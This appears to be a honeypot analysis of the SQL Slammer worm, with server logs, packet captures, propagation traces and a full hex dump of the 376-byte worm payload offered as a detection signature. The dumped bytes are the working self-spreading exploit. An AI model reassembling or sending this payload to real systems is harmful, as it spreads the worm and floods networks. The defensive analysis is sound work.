MS-SQL Server Worm (also called Sapphire, SQL Slammer, SQL Hell)

Infection sequence:
  1. A honeypot start the MS SQL server at 11:20:55

  2. At 20:00:48, get infected with the 376 byte long UDP packet to port 1434

  3. Since then, the infected honeypot was sending a 376 byte long UDP packet to port 1434 using random targets at a very high rate. Vulnerable systems will also immediately start sending identical 376 byte packets once they are infected. The worm is sending traffic to random IPs, including multicast IPs, which may improve its Denial of Service (DOS) capability.

According to SANS, a single ms-sql server have been reported to generate traffic in excess of 50 MBit/sec. after being infected. Such DOS capability causes link degradation. As a result of this, root DNS servers and other resources have been unavailable at times. Event log shown in the honeypot:

The honeypot start the MS SQL server at 11:20:55

Sep 16 11:20:45 honey3 Eventlog to Syslog Service Started: Version 3.4 Sep 16 11:20:55 honey3 MSSQLSERVER: N/A: 17052 : Microsoft SQL Server 2000 - 8.0 0.194 (Intel X86) Aug 6 2000 00:57:48 Copyright (c) 1988-2000 Microsoft Corporat ion Enterprise Edition on Windows NT 5.0 (Build 2195: Service Pack 3) Sep 16 11:20:55 honey3 MSSQLSERVER: N/A: 17104 : Server Process ID is 744. Sep 16 11:20:55 honey3 MSSQLSERVER: N/A: 17124 : SQL Server configured for threa d mode processing. Sep 16 11:20:55 honey3 MSSQLSERVER: N/A: 17125 : Using dynamic lock allocation. [2500] Lock Blocks, [5000] Lock Owner Blocks. Sep 16 11:20:55 honey3 MSSQLSERVER: N/A: 17162 : SQL Server is starting at prior ity class 'normal'(1 CPU detected). Sep 16 11:21:00 honey3 Distributed Link Tracking Client: N/A: The volume ID for E: has been reset, since it was a duplicate of that on C:. This volume ID is use d by Distributed Link Tracking to automatically repair file links, such as Shell Shortcuts and OLE links, when for some reason those links become broken. Sep 16 11:21:05 honey3 Microsoft Search: N/A: The Search service has started. Sep 16 11:21:15 honey3 MSSQLSERVER: N/A: 17834 : Using 'SSNETLIB.DLL' version '8 .0.194'. Sep 16 11:21:20 honey3 MSSQLSERVER: N/A: 17052 : Recovery complete. Sep 16 11:21:20 honey3 MSSQLSERVER: N/A: 17126 : SQL Server is ready for client connections Sep 16 11:21:20 honey3 MSSQLSERVER: N/A: 19013 : SQL server listening on 192.168 .20.3:1433, 127.0.0.1:1433. Sep 16 11:21:20 honey3 MSSQLSERVER: N/A: 19013 : SQL server listening on TCP, Sh ared Memory, Named Pipes. Sep 16 11:21:20 honey3 MSSQLServer: N/A: SuperSocket info: (SpnRegister) : Error 1355. At 20:00:48, honeypot got infected with the 376 byte long UDP packet to port 1434 09/16-20:00:48.854154 213.112.161.133:1401 -> 192.168.20.3:1434 UDP TTL:105 TOS:0x0 ID:2838 IpLen:20 DgmLen:404 Len: 376 ................................................................ ....................................B.........p.B.p.B........h.. .B.....1...P..5....P..Qh.dllhel32hkernQhounthickChGetTf.llQh32.d hws2_f.etQhsockf.toQhsend....B.E.P..P.E.P.E.P..P....B....=U..Qt. ....B....1.QQP............Q.E.P.E.P..j.j.j...P.E.P.E.P........<a ...E...@...........).......E.j..E.P1.Qf..x.Q.E.P.E.P....^@ =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/16-20:00:48.871355 192.168.20.3:1034 -> 89.146.178.104:1434 UDP TTL:128 TOS:0x0 ID:482 IpLen:20 DgmLen:404 Len: 376 ................................................................ ....................................B.........p.B.p.B........h.. .B.....1...P..5....P..Qh.dllhel32hkernQhounthickChGetTf.llQh32.d hws2_f.etQhsockf.toQhsend....B.E.P..P.E.P.E.P..P....B....=U..Qt. ....B....1.QQP............Q.E.P.E.P..j.j.j...P.E.P.E.P........<a ...E...@...........).......E.j..E.P1.Qf..x.Q.E.P.E.P....^@ =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/16-20:00:48.871397 192.168.20.3:1034 -> 25.231.4.116:1434 UDP TTL:128 TOS:0x0 ID:483 IpLen:20 DgmLen:404 Len: 376 ................................................................ ....................................B.........p.B.p.B........h.. .B.....1...P..5....P..Qh.dllhel32hkernQhounthickChGetTf.llQh32.d hws2_f.etQhsockf.toQhsend....B.E.P..P.E.P.E.P..P....B....=U..Qt. ....B....1.QQP............Q.E.P.E.P..j.j.j...P.E.P.E.P........<a ...E...@...........).......E.j..E.P1.Qf..x.Q.E.P.E.P....^@ =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

The worm signature

09/16-20:00:48.854154 213.112.161.133:1401 -> 192.168.20.3:1434 UDP TTL:105 TOS:0x0 ID:2838 IpLen:20 DgmLen:404 Len: 376 04 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 ................ 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 ................ 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 ................ 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 ................ 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 ................ 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 ................ 01 DC C9 B0 42 EB 0E 01 01 01 01 01 01 01 70 AE ....B.........p. 42 01 70 AE 42 90 90 90 90 90 90 90 90 68 DC C9 B.p.B........h.. B0 42 B8 01 01 01 01 31 C9 B1 18 50 E2 FD 35 01 .B.....1...P..5. 01 01 05 50 89 E5 51 68 2E 64 6C 6C 68 65 6C 33 ...P..Qh.dllhel3 32 68 6B 65 72 6E 51 68 6F 75 6E 74 68 69 63 6B 2hkernQhounthick 43 68 47 65 74 54 66 B9 6C 6C 51 68 33 32 2E 64 ChGetTf.llQh32.d 68 77 73 32 5F 66 B9 65 74 51 68 73 6F 63 6B 66 hws2_f.etQhsockf B9 74 6F 51 68 73 65 6E 64 BE 18 10 AE 42 8D 45 .toQhsend....B.E D4 50 FF 16 50 8D 45 E0 50 8D 45 F0 50 FF 16 50 .P..P.E.P.E.P..P BE 10 10 AE 42 8B 1E 8B 03 3D 55 8B EC 51 74 05 ....B....=U..Qt. BE 1C 10 AE 42 FF 16 FF D0 31 C9 51 51 50 81 F1 ....B....1.QQP.. 03 01 04 9B 81 F1 01 01 01 01 51 8D 45 CC 50 8B ..........Q.E.P. 45 C0 50 FF 16 6A 11 6A 02 6A 02 FF D0 50 8D 45 E.P..j.j.j...P.E C4 50 8B 45 C0 50 FF 16 89 C6 09 DB 81 F3 3C 61 .P.E.P........<a D9 FF 8B 45 B4 8D 0C 40 8D 14 88 C1 E2 04 01 C2 ...E...@........ C1 E2 08 29 C2 8D 04 90 01 D8 89 45 B4 6A 10 8D ...).......E.j.. 45 B0 50 31 C9 51 66 81 F1 78 01 51 8D 45 03 50 E.P1.Qf..x.Q.E.P 8B 45 AC 50 FF D6 EB CA .E.P.... =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/16-20:00:48.871355 192.168.20.3:1034 -> 89.146.178.104:1434 UDP TTL:128 TOS:0x0 ID:482 IpLen:20 DgmLen:404 Len: 376 04 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 ................ 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 ................ 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 ................ 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 ................ 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 ................ 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 ................ 01 DC C9 B0 42 EB 0E 01 01 01 01 01 01 01 70 AE ....B.........p. 42 01 70 AE 42 90 90 90 90 90 90 90 90 68 DC C9 B.p.B........h.. B0 42 B8 01 01 01 01 31 C9 B1 18 50 E2 FD 35 01 .B.....1...P..5. 01 01 05 50 89 E5 51 68 2E 64 6C 6C 68 65 6C 33 ...P..Qh.dllhel3 32 68 6B 65 72 6E 51 68 6F 75 6E 74 68 69 63 6B 2hkernQhounthick 43 68 47 65 74 54 66 B9 6C 6C 51 68 33 32 2E 64 ChGetTf.llQh32.d 68 77 73 32 5F 66 B9 65 74 51 68 73 6F 63 6B 66 hws2_f.etQhsockf B9 74 6F 51 68 73 65 6E 64 BE 18 10 AE 42 8D 45 .toQhsend....B.E D4 50 FF 16 50 8D 45 E0 50 8D 45 F0 50 FF 16 50 .P..P.E.P.E.P..P BE 10 10 AE 42 8B 1E 8B 03 3D 55 8B EC 51 74 05 ....B....=U..Qt. BE 1C 10 AE 42 FF 16 FF D0 31 C9 51 51 50 81 F1 ....B....1.QQP.. 03 01 04 9B 81 F1 01 01 01 01 51 8D 45 CC 50 8B ..........Q.E.P. 45 C0 50 FF 16 6A 11 6A 02 6A 02 FF D0 50 8D 45 E.P..j.j.j...P.E C4 50 8B 45 C0 50 FF 16 89 C6 09 DB 81 F3 3C 61 .P.E.P........<a D9 FF 8B 45 B4 8D 0C 40 8D 14 88 C1 E2 04 01 C2 ...E...@........ C1 E2 08 29 C2 8D 04 90 01 D8 89 45 B4 6A 10 8D ...).......E.j.. 45 B0 50 31 C9 51 66 81 F1 78 01 51 8D 45 03 50 E.P1.Qf..x.Q.E.P 8B 45 AC 50 FF D6 EB CA .E.P....

The infected honeypot was sending a 376 byte long UDP packet to port 1434 using random targets at a very high rate.

20:00:48.854154 213.112.161.133.1401 > 192.168.20.3.1434: udp 376 20:00:48.870997 arp who-has 192.168.20.254 tell 192.168.20.3 20:00:48.871056 arp reply 192.168.20.254 is-at 0:50:fc:2b:1b:c5 20:00:48.871355 192.168.20.3.1034 > 89.146.178.104.1434: udp 376 20:00:48.871397 192.168.20.3.1034 > 25.231.4.116.1434: udp 376 20:00:48.871429 192.168.20.3.1034 > 217.232.208.46.1434: udp 376 20:00:48.871468 192.168.20.3.1034 > 153.227.35.52.1434: udp 376 20:00:48.871502 192.168.20.3.1034 > 89.243.5.31.1434: udp 376 20:00:48.871536 192.168.20.3.1034 > 25.196.206.153.1434: udp 376 20:00:48.871585 192.168.20.3.1034 > 217.81.39.243.1434: udp 376 20:00:48.871607 192.168.20.3.1034 > 153.168.4.22.1434: udp 376 20:00:48.871642 192.168.20.3.1034 > 89.164.183.124.1434: udp 376 20:00:48.871683 192.168.20.3.1034 > 25.177.189.198.1434: udp 376 20:00:48.871715 192.168.20.3.1034 > 217.138.78.170.1434: udp 376 20:00:48.871753 192.168.20.3.1034 > 153.253.178.6.1434: udp 376 20:00:48.871787 192.168.20.3.1034 > 89.165.64.248.1434: udp 376 20:00:48.871821 192.168.20.3.1034 > 25.174.102.187.1434: udp 376 20:00:48.871857 192.168.20.3.1034 > 217.147.135.166.1434: udp 376 20:00:48.871892 192.168.20.3.1034 > 153.226.107.83.1434: udp 376 20:00:48.871928 192.168.20.3.1034 > 89.246.233.221.1434: udp 376 20:00:48.871970 192.168.20.3.1034 > 25.187.238.246.1434: udp 376 20:00:48.872002 192.168.20.3.1034 > 217.108.99.62.1434: udp 376 20:00:48.872047 192.168.20.3.1034 > 153.87.124.124.1434: udp 376 20:00:48.872075 192.168.20.3.1034 > 89.151.204.32.1434: udp 376 20:00:48.872119 192.168.20.3.1034 > 25.216.10.68.1434: udp 376 20:00:48.872150 192.168.20.3.1034 > 217.21.195.37.1434: udp 376 20:00:48.872190 192.168.20.3.1034 > 153.92.65.42.1434: udp 376 20:00:48.872225 192.168.20.3.1034 > 89.136.209.123.1434: udp 376 20:00:48.872266 192.168.20.3.1034 > 25.5.0.86.1434: udp 376 20:00:48.872302 192.168.20.3.1034 > 217.142.215.150.1434: udp 376 20:00:48.872338 192.168.20.3.1034 > 153.241.39.178.1434: udp 376 20:00:48.872380 192.168.20.3.1034 > 89.201.177.226.1434: udp 376 20:00:48.872415 192.168.20.3.1034 > 25.66.163.117.1434: udp 376 20:00:48.872453 192.168.20.3.1034 > 217.215.33.75.1434: udp 376 20:00:48.872489 192.168.20.3.1034 > 153.22.173.43.1434: udp 376 20:00:48.872524 192.168.20.3.1034 > 89.90.246.66.1434: udp 376 20:00:48.872563 192.168.20.3.1034 > 25.143.89.62.1434: udp 376 20:00:48.872602 192.168.20.3.1034 > 217.240.114.68.1434: udp 376 20:00:48.872637 192.168.20.3.1034 > 153.203.93.21.1434: udp 376 20:00:48.872675 192.168.20.3.1034 > 89.59.248.148.1434: udp 376 20:00:48.872710 192.168.20.3.1034 > 25.236.23.107.1434: udp 376 20:00:48.872746 192.168.20.3.1034 > 217.217.235.101.1434: udp 376 20:00:48.872791 192.168.20.3.1034 > 153.16.215.137.1434: udp 376 20:00:48.872825 192.168.20.3.1034 > 89.108.224.60.1434: udp 376 20:00:48.872860 192.168.20.3.1034 > 25.89.99.179.1434: udp 376 20:00:48.872898 192.168.20.3.1034 > 217.146.253.220.1434: udp 376 20:00:48.872933 192.168.20.3.1034 > 153.229.197.4.1434: udp 376 20:00:48.872968 192.168.20.3.1034 > 89.237.167.187.1434: udp 376 20:00:48.873006 192.168.20.3.1034 > 25.214.80.184.1434: udp 376 20:00:48.873049 192.168.20.3.1034 > 217.27.105.90.1434: udp 376 20:00:48.873082 192.168.20.3.1034 > 153.74.231.183.1434: udp 376 20:00:48.873120 192.168.20.3.1034 > 89.190.23.176.1434: udp 376 20:00:48.873156 192.168.20.3.1034 > 25.99.133.1.1434: udp 376 20:00:48.873190 192.168.20.3.1034 > 217.116.63.27.1434: udp 376 20:00:48.873228 192.168.20.3.1034 > 153.63.8.112.1434: udp 376 20:00:48.873268 192.168.20.3.1034 > 89.223.200.39.1434: udp 376 20:00:48.873307 192.168.20.3.1034 > 25.0.54.10.1434: udp 376 20:00:48.873344 192.168.20.3.1034 > 217.157.225.193.1434: udp 376 20:00:48.873378 192.168.20.3.1034 > 153.196.5.10.1434: udp 376 20:00:48.873413 192.168.20.3.1034 > 89.80.36.64.1434: udp 376 20:00:48.873453 192.168.20.3.1034 > 25.173.39.94.1434: udp 376 20:00:48.873492 192.168.20.3.1034 > 217.150.0.255.1434: udp 376 20:00:48.873533 192.168.20.3.1034 > 153.217.204.119.1434: udp 376 20:00:48.873573 192.168.20.3.1034 > 89.17.99.23.1434: udp 376 20:00:48.873605 192.168.20.3.1034 > 25.106.175.198.1434: udp 376 20:00:48.873642 192.168.20.3.1034 > 217.95.157.10.1434: udp 376

Up to Oct 2003, our IDS still picks up some MSSQL worm


References:

http://www.cert.org/advisories/CA-2003-04.html
http://www.techie.hopto.org/sqlworm.html
http://isc.incidents.org/analysis.html?id=180